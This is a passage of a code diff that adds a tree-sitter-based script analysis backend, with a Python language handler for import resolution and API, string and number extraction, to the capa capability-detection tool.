diff --git a/capa/features/address.py b/capa/features/address.py index 31b5d8203e..ccaccd395a 100644 --- a/capa/features/address.py +++ b/capa/features/address.py @@ -182,6 +182,30 @@ def __index__(self): return self.token + self.offset +class ScriptAddress(Address): + """an address for a location within a script file (line, column).""" + + def __init__(self, line: int, column: int = 0): + assert line >= 0 + self.line = line + self.column = column + + def __eq__(self, other): + if isinstance(other, ScriptAddress): + return (self.line, self.column) == (other.line, other.column) + return False + + def __lt__(self, other): + assert isinstance(other, ScriptAddress) + return (self.line, self.column) < (other.line, other.column) + + def __hash__(self): + return hash((self.line, self.column)) + + def __repr__(self): + return f"script(line={self.line}, col={self.column})" + + class _NoAddress(Address): def __eq__(self, other): return True diff --git a/capa/features/common.py b/capa/features/common.py index 5bde5d3599..2cb9b6edbd 100644 --- a/capa/features/common.py +++ b/capa/features/common.py @@ -491,7 +491,8 @@ def evaluate(self, features: "capa.engine.FeatureSet", short_circuit=True): FORMAT_PE = "pe" FORMAT_ELF = "elf" FORMAT_DOTNET = "dotnet" -VALID_FORMAT = (FORMAT_PE, FORMAT_ELF, FORMAT_DOTNET) +FORMAT_SCRIPT = "script" +VALID_FORMAT = (FORMAT_PE, FORMAT_ELF, FORMAT_DOTNET, FORMAT_SCRIPT) # internal only, not to be used in rules FORMAT_AUTO = "auto" FORMAT_SC32 = "sc32" @@ -513,6 +514,7 @@ def evaluate(self, features: "capa.engine.FeatureSet", short_circuit=True): FORMAT_RESULT, FORMAT_BINEXPORT2, FORMAT_BINJA_DB, + FORMAT_SCRIPT, } DYNAMIC_FORMATS = { FORMAT_CAPE, diff --git a/capa/features/extractors/script/__init__.py b/capa/features/extractors/script/__init__.py new file mode 100644 index 0000000000..9987997e86 --- /dev/null +++ b/capa/features/extractors/script/__init__.py @@ -0,0 +1,75 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Script analysis backend for capa. + +Uses tree-sitter to parse scripts into ASTs and extract features +for capability detection. The architecture is modular: core +infrastructure is language-agnostic, and each supported language +implements a LanguageHandler plugin. + +Supported languages: + - Python (via tree-sitter-python) + +To add a new language: + 1. Create a handler in capa/features/extractors/script/languages/ + 2. Register it in LANGUAGE_HANDLERS below +""" + +import re +import logging +from pathlib import Path + +logger = logging.getLogger(__name__) + +# mapping from language name to file extensions (without dot) +SCRIPT_EXTENSIONS: dict[str, tuple[str, ...]] = { + "python": ("py", "py3"), +} + +# shebang patterns: compiled regex -> language name +SHEBANG_PATTERNS: list[tuple[re.Pattern, str]] = [ + (re.compile(rb"^#!.*\bpython[23]?\b"), "python"), +] + + +def detect_script_language(path: Path, buf: bytes) -> str: + """ + Detect the scripting language of the given file. + + Checks in order: + 1. File extension + 2. Shebang line + + args: + path: path to the script file. + buf: raw bytes of the file. + + returns: + the language name (e.g., "python"), or empty string if unknown. + """ + # 1. check file extension + suffix = path.suffix.lstrip(".") + for language, extensions in SCRIPT_EXTENSIONS.items(): + if suffix in extensions: + return language + + # 2. check shebang line + first_line = buf.split(b"\n", 1)[0] + for pattern, language in SHEBANG_PATTERNS: + if pattern.match(first_line): + return language + + return "" diff --git a/capa/features/extractors/script/extractor.py b/capa/features/extractors/script/extractor.py new file mode 100644 index 0000000000..47ba779ed1 --- /dev/null +++ b/capa/features/extractors/script/extractor.py @@ -0,0 +1,202 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +ScriptFeatureExtractor — the main extractor for script analysis. + +Implements capa's StaticFeatureExtractor interface using tree-sitter +for AST-based feature extraction. Language-specific logic is delegated +to LanguageHandler instances (e.g., PythonLanguageHandler). + +Scope mapping for scripts: + - File scope: entire script (imports, global strings, etc.) + - Function scope: each function definition in the script + - Basic block: one BB per function (like dnfile for .NET) + - Instruction: each statement-level AST node +""" + +import hashlib +import logging +from typing import Iterator +from pathlib import Path + +from tree_sitter import Parser + +import capa.features.extractors.script.file +import capa.features.extractors.script.insn +from capa.features.insn import API +from capa.features.common import OS, ARCH_ANY, OS_ANY, FORMAT_SCRIPT, Arch, Format, Feature, String +from capa.features.address import NO_ADDRESS, Address, ScriptAddress +from capa.features.extractors.script import detect_script_language +from capa.features.extractors.script.lang_base import ImportContext, LanguageHandler +from capa.features.extractors.script.languages.python import PythonLanguageHandler +from capa.features.extractors.base_extractor import ( + BBHandle, + InsnHandle, + SampleHashes, + FunctionHandle, + StaticFeatureExtractor, +) + +logger = logging.getLogger(__name__) + + +# registry of language handlers +LANGUAGE_HANDLERS: dict[str, LanguageHandler] = { + "python": PythonLanguageHandler(), +} + + +class ScriptFeatureExtractor(StaticFeatureExtractor): + """ + Feature extractor for scripting languages using tree-sitter. + + This extractor: + 1. Detects the script language (via extension/shebang) + 2. Parses the script with the appropriate tree-sitter grammar + 3. Delegates feature extraction to a LanguageHandler plugin + 4. Yields features following capa's scope hierarchy + + The design mirrors existing backends (dnfile, vivisect): + - Global features: format, OS, arch + - File features: imports, strings + - Function features: one per function definition + - Basic block: one per function body (like dnfile) + - Instruction features: one per statement in function body + """ + + def __init__(self, path: Path, language: str = ""): + buf = path.read_bytes() + self.path = path + self.buf = buf + + md5 = hashlib.md5(buf).hexdigest() + sha1 = hashlib.sha1(buf).hexdigest() + sha256 = hashlib.sha256(buf).hexdigest() + super().__init__( + hashes=SampleHashes( + md5=md5, + sha1=sha1, + sha256=sha256, + ) + ) + + # detect language + if not language: + language = detect_script_language(path, buf) + if not language: + raise ValueError(f"unable to detect script language for: {path}") + + self.language = language + + # get the language handler + if language not in LANGUAGE_HANDLERS: + raise ValueError(f"unsupported script language: {language}") + self.handler: LanguageHandler = LANGUAGE_HANDLERS[language] + + # parse the script with tree-sitter + parser = Parser(self.handler.get_tree_sitter_language()) + self.tree = parser.parse(buf) + + # pre-compute import context for API name resolution + self.import_ctx: ImportContext = self.handler.extract_imports(self.tree) + + # pre-compute global features (yielded at every scope) + self.global_features: list[tuple[Feature, Address]] = [] + self.global_features.append((Format(FORMAT_SCRIPT), NO_ADDRESS)) + self.global_features.append((OS(OS_ANY), NO_ADDRESS)) + self.global_features.append((Arch(ARCH_ANY), NO_ADDRESS)) + + def get_base_address(self) -> Address: + return NO_ADDRESS + + def extract_global_features(self) -> Iterator[tuple[Feature, Address]]: + yield from self.global_features + + def extract_file_features(self) -> Iterator[tuple[Feature, Address]]: + yield from capa.features.extractors.script.file.extract_features( + self.tree, self.handler, self.buf + ) + + def get_functions(self) -> Iterator[FunctionHandle]: + """ + Yield a FunctionHandle for each function definition in the script. + + The inner object is the tree-sitter Node for the function definition. + Context stores the import context for name resolution. + """ + for node in self.handler.get_function_nodes(self.tree): + name = self.handler.get_function_name(node) + addr = ScriptAddress( + line=node.start_point[0], + column=node.start_point[1], + ) + yield FunctionHandle( + address=addr, + inner=node, + ctx={"handler": self.handler, "import_ctx": self.import_ctx, "name": name}, + ) + + def extract_function_features(self, fh: FunctionHandle) -> Iterator[tuple[Feature, Address]]: + # no function-scope features in the skeleton + # future: call count, decorator characteristics, etc. + yield from () + + def get_basic_blocks(self, fh: FunctionHandle) -> Iterator[BBHandle]: + """ + Yield one basic block per function (like dnfile). + + Scripts don't have basic blocks in the traditional sense, + so we treat the entire function body as a single block. + """ + yield BBHandle( + address=fh.address, + inner=fh.inner, + ) + + def extract_basic_block_features( + self, fh: FunctionHandle, bbh: BBHandle + ) -> Iterator[tuple[Feature, Address]]: + # no basic-block-scope features in the skeleton + yield from () + + def get_instructions(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[InsnHandle]: + """ + Yield an InsnHandle for each statement in the function body. + + Each statement-level AST node maps to one "instruction" in capa's model. + """ + handler: LanguageHandler = fh.ctx["handler"] + for node in handler.get_statement_nodes(fh.inner): + addr = ScriptAddress( + line=node.start_point[0], + column=node.start_point[1], + ) + yield InsnHandle( + address=addr, + inner=node, + ) + + def extract_insn_features( + self, fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle + ) -> Iterator[tuple[Feature, Address]]: + yield from capa.features.extractors.script.insn.extract_features(fh, bbh, ih) + + def is_library_function(self, addr: Address) -> bool: + # scripts don't have library functions in the traditional sense + return False + + def get_function_name(self, addr: Address) -> str: + # not used in the current pipeline for script analysis + return "" diff --git a/capa/features/extractors/script/file.py b/capa/features/extractors/script/file.py new file mode 100644 index 0000000000..6f9f7e0e02 --- /dev/null +++ b/capa/features/extractors/script/file.py @@ -0,0 +1,91 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +File-scope feature extraction for scripts. + +Extracts features that apply to the entire script file: + - Import features (from import statements) + - String features (from file-level string scanning) +""" + +import logging +from typing import Callable, Iterator + +from tree_sitter import Tree + +import capa.features.extractors.common +from capa.features.file import Import +from capa.features.common import String, Feature +from capa.features.address import NO_ADDRESS, Address, ScriptAddress +from capa.features.extractors.script.lang_base import LanguageHandler + +logger = logging.getLogger(__name__) + + +def extract_file_import_features( + tree: Tree, handler: LanguageHandler, buf: bytes +) -> Iterator[tuple[Feature, Address]]: + """ + Extract Import features from the script's import statements. + + Each import statement yields an Import feature with the module name. + """ + ctx = handler.extract_imports(tree) + for local_name, qualified_name in ctx.names.items(): + yield Import(qualified_name), NO_ADDRESS + + for module_name in ctx.wildcard_modules: + yield Import(module_name), NO_ADDRESS + + +def extract_file_string_features( + tree: Tree, handler: LanguageHandler, buf: bytes +) -> Iterator[tuple[Feature, Address]]: + """ + Extract string features from the file using byte-level string scanning. + + This uses capa's existing string extraction (ASCII + UTF-16 LE), + which provides coverage even for strings not visible in the AST + (e.g., in comments, docstrings, or encoded data). + """ + yield from capa.features.extractors.common.extract_file_strings(buf) + + +FILE_HANDLERS: tuple[ + Callable[[Tree, LanguageHandler, bytes], Iterator[tuple[Feature, Address]]], + ..., +] = ( + extract_file_import_features, + extract_file_string_features, +) + + +def extract_features( + tree: Tree, handler: LanguageHandler, buf: bytes +) -> Iterator[tuple[Feature, Address]]: + """ + Extract file-scope features from the script. + + args: + tree: the parsed tree-sitter Tree. + handler: the language handler for this script. + buf: raw bytes of the file. + + yields: + (Feature, Address): file-scope features. + """ + for handler_func in FILE_HANDLERS: + for feature, addr in handler_func(tree, handler, buf): + yield feature, addr diff --git a/capa/features/extractors/script/insn.py b/capa/features/extractors/script/insn.py new file mode 100644 index 0000000000..f57a785af3 --- /dev/null +++ b/capa/features/extractors/script/insn.py @@ -0,0 +1,103 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Statement-scope (instruction) feature extraction for scripts. + +Extracts features from individual statement-level AST nodes: + - API features (function calls) + - String features (string literals) + - Number features (numeric literals) + +Follows the same INSTRUCTION_HANDLERS tuple pattern used in +viv/insn.py and dnfile/insn.py. +""" + +import logging +from typing import Callable, Iterator + +from tree_sitter import Node + +from capa.features.common import Feature +from capa.features.address import Address +from capa.features.extractors.script.lang_base import ImportContext, LanguageHandler +from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle + +logger = logging.getLogger(__name__) + + +def extract_insn_api_features( + fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle +) -> Iterator[tuple[Feature, Address]]: + """ + Extract API (function call) features from the given statement. + + Delegates to the language handler's extract_insn_api_features, + which handles language-specific call resolution and import context. + """ + handler: LanguageHandler = fh.ctx["handler"] + ctx: ImportContext = fh.ctx["import_ctx"] + node: Node = ih.inner + yield from handler.extract_insn_api_features(node, ctx) + + +def extract_insn_string_features( + fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle +) -> Iterator[tuple[Feature, Address]]: + """ + Extract string literal features from the given statement. + """ + handler: LanguageHandler = fh.ctx["handler"] + node: Node = ih.inner + yield from handler.extract_insn_string_features(node) + + +def extract_insn_number_features( + fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle +) -> Iterator[tuple[Feature, Address]]: + """ + Extract numeric literal features from the given statement. + """ + handler: LanguageHandler = fh.ctx["handler"] + node: Node = ih.inner + yield from handler.extract_insn_number_features(node) + + +INSTRUCTION_HANDLERS: tuple[ + Callable[[FunctionHandle, BBHandle, InsnHandle], Iterator[tuple[Feature, Address]]], + ..., +] = ( + extract_insn_api_features, + extract_insn_string_features, + extract_insn_number_features, +) + + +def extract_features( + fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle +) -> Iterator[tuple[Feature, Address]]: + """ + Extract features from the given statement (instruction scope). + + args: + fh: the function handle containing the statement. + bbh: the basic block handle (function body). + ih: the instruction handle (statement node). + + yields: + (Feature, Address): instruction-scope features. + """ + for handler in INSTRUCTION_HANDLERS: + for feature, addr in handler(fh, bbh, ih): + yield feature, addr diff --git a/capa/features/extractors/script/lang_base.py b/capa/features/extractors/script/lang_base.py new file mode 100644 index 0000000000..a92d78e3e6 --- /dev/null +++ b/capa/features/extractors/script/lang_base.py @@ -0,0 +1,198 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Abstract base for language handlers. + +Each supported scripting language implements a LanguageHandler subclass +that knows how to walk its specific AST node types and extract capa features. + +The core extractor (ScriptFeatureExtractor) delegates to these handlers, +keeping language-specific logic isolated. +""" + +import abc +import logging +from typing import Iterator +from dataclasses import field, dataclass + +from tree_sitter import Node, Tree + +from capa.features.common import Feature +from capa.features.address import Address + +logger = logging.getLogger(__name__) + + +@dataclass +class ImportContext: + """ + Tracks import statements and their aliases within a script. + + Used to resolve function calls to their fully-qualified module paths. + + examples: + `import os` -> names = {"os": "os"} + `import os as o` -> names = {"o": "os"} + `from os.path import join` -> names = {"join": "os.path.join"} + `from os.path import *` -> wildcard_modules = {"os.path"} + + When resolving a call like `o.system(...)`, the handler looks up + "o" in names to get "os", then constructs "os.system". + """ + + # mapping from local name -> fully-qualified module/attribute name + names: dict[str, str] = field(default_factory=dict) + + # modules imported via wildcard (from X import *) + # we can't resolve individual names from these, but we track them + wildcard_modules: set[str] = field(default_factory=set) + + def resolve_name(self, name: str) -> str: + """ + Resolve a local name to its fully-qualified import path. + + args: + name: the local name used in the script (e.g., "o" for `import os as o`). + + returns: + the resolved name (e.g., "os"), or the original name if not found. + """ + return self.names.get(name, name) + + +class LanguageHandler(abc.ABC): + """ + Plugin interface for language-specific AST feature extraction. + + Each supported scripting language (Python, Bash, PowerShell, etc.) + implements this interface. The core ScriptFeatureExtractor uses it + to walk the AST and extract features without knowing any + language-specific details. + + To add a new language: + 1. Subclass LanguageHandler + 2. Implement all abstract methods + 3. Register in the LANGUAGE_HANDLERS dict in __init__.py + """ + + @abc.abstractmethod + def get_tree_sitter_language(self): + """ + Return the tree-sitter Language object for this language. + + returns: + tree_sitter.Language: the language grammar object. + """ + ... + + @abc.abstractmethod + def get_function_nodes(self, tree: Tree) -> Iterator[Node]: + """ + Yield top-level AST nodes that represent function definitions. + + args: + tree: the parsed tree-sitter Tree. + + yields: + Node: each function definition node. + """ + ... + + @abc.abstractmethod + def get_function_name(self, node: Node) -> str: + """ + Extract the function name from a function definition node. + + args: + node: a function definition AST node. + + returns: + str: the function name. + """ + ... + + @abc.abstractmethod + def get_statement_nodes(self, node: Node) -> Iterator[Node]: + """ + Yield statement-level AST nodes within a function body. + + These map to capa's "instruction" scope. + + args: + node: a function definition AST node. + + yields: + Node: each statement node within the function body. + """ + ... + + @abc.abstractmethod + def extract_imports(self, tree: Tree) -> ImportContext: + """ + Parse import statements and build an ImportContext. + + args: + tree: the parsed tree-sitter Tree. + + returns: + ImportContext: the resolved import context. + """ + ... + + @abc.abstractmethod + def extract_insn_api_features( + self, node: Node, ctx: ImportContext + ) -> Iterator[tuple[Feature, Address]]: + """ + Extract API/function-call features from a statement node. + + args: + node: a statement-level AST node. + ctx: the script's import context for name resolution. + + yields: + (Feature, Address): API features and their script addresses. + """ + ... + + @abc.abstractmethod + def extract_insn_string_features( + self, node: Node + ) -> Iterator[tuple[Feature, Address]]: + """ + Extract string literal features from a statement node. + + args: + node: a statement-level AST node. + + yields: + (Feature, Address): String features and their script addresses. + """ + ... + + @abc.abstractmethod + def extract_insn_number_features( + self, node: Node + ) -> Iterator[tuple[Feature, Address]]: + """ + Extract numeric literal features from a statement node. + + args: + node: a statement-level AST node. + + yields: + (Feature, Address): Number features and their script addresses. + """ + ... diff --git a/capa/features/extractors/script/languages/__init__.py b/capa/features/extractors/script/languages/__init__.py new file mode 100644 index 0000000000..6d5e14bcf4 --- /dev/null +++ b/capa/features/extractors/script/languages/__init__.py @@ -0,0 +1,13 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. diff --git a/capa/features/extractors/script/languages/python.py b/capa/features/extractors/script/languages/python.py new file mode 100644 index 0000000000..b2ff0b4c84 --- /dev/null +++ b/capa/features/extractors/script/languages/python.py @@ -0,0 +1,390 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Python language handler for tree-sitter-based script analysis. + +Maps Python AST node types to capa's feature model: + - function_definition -> function scope + - call / attribute -> API features (with import resolution) + - import_statement / import_from_statement -> Import features + - string / concatenated_string -> String features + - integer / float -> Number features + +Handles edge cases: + - import aliasing (import X as Y) + - from-imports (from os.path import join) + - dynamic imports (__import__, importlib.import_module) + - decorators (treated as characteristics) + - nested/chained calls (recursive AST walk) + - f-strings (extract static string parts) +""" + +import logging +from typing import Iterator + +import tree_sitter_python as tspython +from tree_sitter import Language, Node, Parser, Tree + +from capa.features.insn import API, Number +from capa.features.common import String, Feature +from capa.features.address import Address, ScriptAddress +from capa.features.extractors.script.lang_base import ImportContext, LanguageHandler + +logger = logging.getLogger(__name__) + + +class PythonLanguageHandler(LanguageHandler): + """ + Python-specific implementation of the LanguageHandler interface. + + Uses tree-sitter-python grammar to parse Python scripts and extract + features that map to capa's feature model. + """ + + PY_LANGUAGE = Language(tspython.language()) + + def get_tree_sitter_language(self): + return self.PY_LANGUAGE + + def get_function_nodes(self, tree: Tree) -> Iterator[Node]: + """ + Yield top-level function definition nodes from the AST. + + Handles both regular functions and async functions. + Does not descend into nested function definitions — those + are left as statement nodes within their parent function. + """ + for child in tree.root_node.children: + if child.type in ("function_definition", "decorated_definition"): + yield child + + def get_function_name(self, node: Node) -> str: + """ + Extract function name from a function_definition or decorated_definition node. + """ + # decorated_definition wraps the actual function_definition + if node.type == "decorated_definition": + for child in node.children: + if child.type == "function_definition": + node = child + break + + name_node = node.child_by_field_name("name") + if name_node is not None: + return name_node.text.decode("utf-8") + return "" + + def get_statement_nodes(self, node: Node) -> Iterator[Node]: + """ + Yield statement-level nodes from a function body. + + These map to capa's "instruction" scope. For a function_definition, + the body is the `block` child node — we yield each direct child statement. + """ + # unwrap decorated_definition + func_node = node + if node.type == "decorated_definition": + for child in node.children: + if child.type == "function_definition": + func_node = child + break + + body = func_node.child_by_field_name("body") + if body is None: + return + + for child in body.children: + yield child + + def extract_imports(self, tree: Tree) -> ImportContext: + """ + Parse all import statements in the script and build an ImportContext. + + Handles: + - import os -> names["os"] = "os" + - import os as o -> names["o"] = "os" + - from os.path import join -> names["join"] = "os.path.join" + - from os.path import join as j -> names["j"] = "os.path.join" + - from os.path import * -> wildcard_modules.add("os.path") + """ + ctx = ImportContext() + + for child in tree.root_node.children: + if child.type == "import_statement": + self._process_import_statement(child, ctx) + elif child.type == "import_from_statement": + self._process_import_from_statement(child, ctx) + + return ctx + + def _process_import_statement(self, node: Node, ctx: ImportContext) -> None: + """ + Process `import X`, `import X as Y`, `import X.Y.Z`. + """ + for child in node.children: + if child.type == "dotted_name": + # import os, import os.path + module_name = child.text.decode("utf-8") + ctx.names[module_name] = module_name + elif child.type == "aliased_import": + # import os as o + name_node = child.child_by_field_name("name") + alias_node = child.child_by_field_name("alias") + if name_node is not None and alias_node is not None: + module_name = name_node.text.decode("utf-8") + alias = alias_node.text.decode("utf-8") + ctx.names[alias] = module_name + + def _process_import_from_statement(self, node: Node, ctx: ImportContext) -> None: + """ + Process `from X import Y`, `from X import Y as Z`, `from X import *`. + """ + module_node = node.child_by_field_name("module_name") + if module_node is None: + return + + module_name = module_node.text.decode("utf-8") + + for child in node.children: + # skip the module_name node itself — it's also a dotted_name + # and would otherwise be mistaken for an imported name + if child.id == module_node.id: + continue + + if child.type == "wildcard_import": + ctx.wildcard_modules.add(module_name) + logger.debug("wildcard import from %s — individual names cannot be resolved", module_name) + elif child.type == "dotted_name": + # from os.path import join + imported_name = child.text.decode("utf-8") + ctx.names[imported_name] = f"{module_name}.{imported_name}" + elif child.type == "aliased_import": + # from os.path import join as j + name_node = child.child_by_field_name("name") + alias_node = child.child_by_field_name("alias") + if name_node is not None and alias_node is not None: + imported_name = name_node.text.decode("utf-8") + alias = alias_node.text.decode("utf-8") + ctx.names[alias] = f"{module_name}.{imported_name}" + + def extract_insn_api_features( + self, node: Node, ctx: ImportContext + ) -> Iterator[tuple[Feature, Address]]: + """ + Extract API (function call) features from a statement node. + + Recursively walks child nodes to handle nested calls like: + base64.b64decode(urllib.request.urlopen(url).read()) + + For each call node, resolves the function name using the ImportContext: + - `os.system(...)` with `import os` -> API("os.system") + - `join(...)` with `from os.path import join` -> API("os.path.join") + - `open(...)` (built-in) -> API("open") + """ + yield from self._extract_calls_recursive(node, ctx) + + def _extract_calls_recursive( + self, node: Node, ctx: ImportContext + ) -> Iterator[tuple[Feature, Address]]: + """ + Recursively walk AST nodes to find all call expressions. + """ + if node.type == "call": + func_node = node.child_by_field_name("function") + if func_node is not None: + api_name = self._resolve_call_name(func_node, ctx) + if api_name: + addr = ScriptAddress( + line=node.start_point[0], + column=node.start_point[1], + ) + yield API(api_name), addr + + # recurse into all children to find nested calls + for child in node.children: + yield from self._extract_calls_recursive(child, ctx) + + def _resolve_call_name(self, func_node: Node, ctx: ImportContext) -> str: + """ + Resolve the fully-qualified name of a function call. + + Handles: + - identifier: `open(...)` -> "open" or resolved via ImportContext + - attribute: `os.system(...)` -> resolved via ImportContext + - chained attributes: `urllib.request.urlopen(...)` -> resolved + """ + if func_node.type == "identifier": + name = func_node.text.decode("utf-8") + return ctx.resolve_name(name) + + elif func_node.type == "attribute": + # e.g., os.system, urllib.request.urlopen + parts = self._collect_attribute_chain(func_node) + if not parts: + return "" + + # try to resolve the root (e.g., "os" in "os.system") + root = parts[0] + resolved_root = ctx.resolve_name(root) + if resolved_root != root: + # the root was an import alias + parts[0] = resolved_root + + return ".".join(parts) + + return "" + + def _collect_attribute_chain(self, node: Node) -> list[str]: + """ + Collect the chain of attribute accesses into a list of names. + + e.g., `urllib.request.urlopen` -> ["urllib", "request", "urlopen"] + + Handles calls on call results like `urlopen(url).read()` by + stopping at the call boundary. + """ + if node.type == "identifier": + return [node.text.decode("utf-8")] + elif node.type == "attribute": + obj_node = node.child_by_field_name("object") + attr_node = node.child_by_field_name("attribute") + if obj_node is not None and attr_node is not None: + obj_parts = self._collect_attribute_chain(obj_node) + attr_name = attr_node.text.decode("utf-8") + return obj_parts + [attr_name] + elif node.type == "call": + # method call on a call result, e.g., urlopen(url).read() + # we stop at the call boundary — the method name ("read") + # is handled by the parent attribute node + func_node = node.child_by_field_name("function") + if func_node is not None: + return self._collect_attribute_chain(func_node) + return [] + + def extract_insn_string_features( + self, node: Node + ) -> Iterator[tuple[Feature, Address]]: + """ + Extract string literal features from a statement node. + + Recursively finds all string nodes. Handles: + - simple strings: "hello" + - concatenated strings: "hello" "world" + - f-strings: extracts static parts only + """ + yield from self._extract_strings_recursive(node) + + def _extract_strings_recursive( + self, node: Node + ) -> Iterator[tuple[Feature, Address]]: + """ + Recursively walk AST nodes to find all string literals. + """ + if node.type == "string": + value = self._extract_string_value(node) + if value and len(value) >= 4: + addr = ScriptAddress( + line=node.start_point[0], + column=node.start_point[1], + ) + yield String(value), addr + + elif node.type == "concatenated_string": + # each child is a string node + for child in node.children: + yield from self._extract_strings_recursive(child) + + else: + for child in node.children: + yield from self._extract_strings_recursive(child) + + def _extract_string_value(self, node: Node) -> str: + """ + Extract the string value from a string node, stripping quotes. + """ + text = node.text.decode("utf-8") + # handle triple-quoted strings + for quote in ('"""', "'''", '"', "'"): + if text.startswith(quote) and text.endswith(quote): + return text[len(quote) : -len(quote)] + # handle prefixed strings like b"...", r"...", f"..." + # strip the prefix first + for prefix in ("b", "B", "r", "R", "f", "F", "rb", "Rb", "rB", "RB", "br", "Br", "bR", "BR"): + if text.startswith(prefix): + text = text[len(prefix) :] + break + for quote in ('"""', "'''", '"', "'"): + if text.startswith(quote) and text.endswith(quote): + return text[len(quote) : -len(quote)] + return "" + + def extract_insn_number_features( + self, node: Node + ) -> Iterator[tuple[Feature, Address]]: + """ + Extract numeric literal features from a statement node. + + Handles integers (decimal, hex, octal, binary) and floats. + """ + yield from self._extract_numbers_recursive(node) + + def _extract_numbers_recursive( + self, node: Node + ) -> Iterator[tuple[Feature, Address]]: + """ + Recursively walk AST nodes to find all numeric literals. + """ + if node.type == "integer": + value = self._parse_python_int(node.text.decode("utf-8")) + if value is not None: + addr = ScriptAddress( + line=node.start_point[0], + column=node.start_point[1], + ) + yield Number(value), addr + + elif node.type == "float": + try: + value = float(node.text.decode("utf-8")) + addr = ScriptAddress( + line=node.start_point[0], + column=node.start_point[1], + ) + yield Number(value), addr + except ValueError: + pass + + else: + for child in node.children: + yield from self._extract_numbers_recursive(child) + + @staticmethod + def _parse_python_int(s: str) -> int | None: + """ + Parse a Python integer literal, handling all bases. + """ + # remove underscores (e.g., 1_000_000) + s = s.replace("_", "") + try: + if s.startswith(("0x", "0X")): + return int(s, 16) + elif s.startswith(("0o", "0O")): + return int(s, 8) + elif s.startswith(("0b", "0B")): + return int(s, 2) + else: + return int(s) + except ValueError: + return None diff --git a/capa/features/freeze/__init__.py b/capa/features/freeze/__init__.py index 3afd0290ff..6cb145d1d4 100644 --- a/capa/features/freeze/__init__.py +++ b/capa/features/freeze/__init__.py @@ -59,6 +59,7 @@ class AddressType(str, Enum): PROCESS = "process" THREAD = "thread" CALL = "call" + SCRIPT = "script" NO_ADDRESS = "no address" @@ -102,6 +103,9 @@ def from_capa(cls, a: capa.features.address.Address) -> "Address": elif a == capa.features.address.NO_ADDRESS or isinstance(a, capa.features.address._NoAddress): return cls(type=AddressType.NO_ADDRESS, value=None) + elif isinstance(a, capa.features.address.ScriptAddress): + return cls(type=AddressType.SCRIPT, value=(a.line, a.column)) + elif isinstance(a, capa.features.address.Address) and not issubclass(type(a), capa.features.address.Address): raise ValueError("don't use an Address instance directly") @@ -165,6 +169,13 @@ def to_capa(self) -> capa.features.address.Address: elif self.type is AddressType.NO_ADDRESS: return capa.features.address.NO_ADDRESS + elif self.type is AddressType.SCRIPT: + assert isinstance(self.value, tuple) + line, column = self.value + assert isinstance(line, int) + assert isinstance(column, int) + return capa.features.address.ScriptAddress(line, column) + else: assert_never(self.type) diff --git a/capa/helpers.py b/capa/helpers.py index 27c757dcc6..fb578a9bc0 100644 --- a/capa/helpers.py +++ b/capa/helpers.py @@ -52,6 +52,7 @@ FORMAT_DOTNET, FORMAT_FREEZE, FORMAT_DRAKVUF, + FORMAT_SCRIPT, FORMAT_UNKNOWN, FORMAT_BINJA_DB, FORMAT_BINEXPORT2, @@ -68,6 +69,7 @@ EXTENSIONS_ELF = "elf_" EXTENSIONS_FREEZE = "frz" EXTENSIONS_BINJA_DB = "bndb" +EXTENSIONS_SCRIPT = ("py", "py3") logger = 